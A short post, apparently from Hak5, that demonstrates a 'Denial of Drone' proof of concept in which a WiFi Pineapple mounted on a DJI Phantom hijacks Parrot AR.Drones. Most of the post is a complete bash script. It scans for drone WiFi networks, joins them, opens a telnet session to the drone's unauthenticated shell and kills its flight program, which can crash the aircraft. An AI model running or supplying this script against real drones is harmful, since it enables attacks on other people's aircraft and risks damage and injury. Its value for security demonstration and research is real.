Drones Hacking Drones

Drone Hacking from an airborne WiFi Pineapple this time on Hak5.

Drone Hacking from an airborne WiFi Pineapple - this time on Hak5. Darren demonstrates his proof of concept "Denial of Drone" attack targeting the Parrot AR.Drone from a WiFi Pineapple equipped DJI Phantom 2 Vision. Inspired by Sammy Kamkar's Raspberry Pi based Skyjacking demo, this drone killer PoC takes a backdoor approach without the need to deauth clients. Here's the quick and dirty shell script. The only dependency is "empty" - a TCL/expect clone that uses stdin/out for process automation.
#!/bin/bash #dronepwn.sh version 0.1 by Darren Kitchen - absolutely horrible code. Do not use under any circumstance. Send all flame mail to hak5.org while true; do if ! ( iw wlan0 scan | grep SSID | awk '{print $2}' | grep [a]rdrone ); then echo "No Drones Found" else echo "Drone Found! Attempting to connect" DRONESSID=`iw wlan0 scan | grep SSID | awk '{print $2}' | grep [a]rdrone` iwconfig wlan1 essid $DRONESSID sleep 2 echo "Testing Wireless Association" if ! ( iwconfig wlan1 | grep $DRONESSID ); then echo "Association to $DRONESSID failed" else echo "Association to $DRONESSID successful" echo "Setting Static IP Address" ifconfig wlan1 192.168.1.5 netmask 255.255.255.0 up sleep 2 echo "Testing IP Connection" if ! ( ping -c1 192.168.1.1 | grep from ); then echo "IP Connection Failed" else echo "IP Connection Successful" echo "Connecting to Telnet and sending kill command. Banzai!" empty -f -i /tmp/drone_input.fifo -o /tmp/drone_output.fifo -p /tmp/drone_empty.pid telnet 192.168.1.1 empty -w -i /tmp/drone_output.fifo -o /tmp/drone_input.fifo BusyBox "kill -KILL \`pidof program.elf\`\n" kill `pidof empty` echo "" echo "Kill command sent. Splash one drone" echo "" fi fi fi sleep 60 done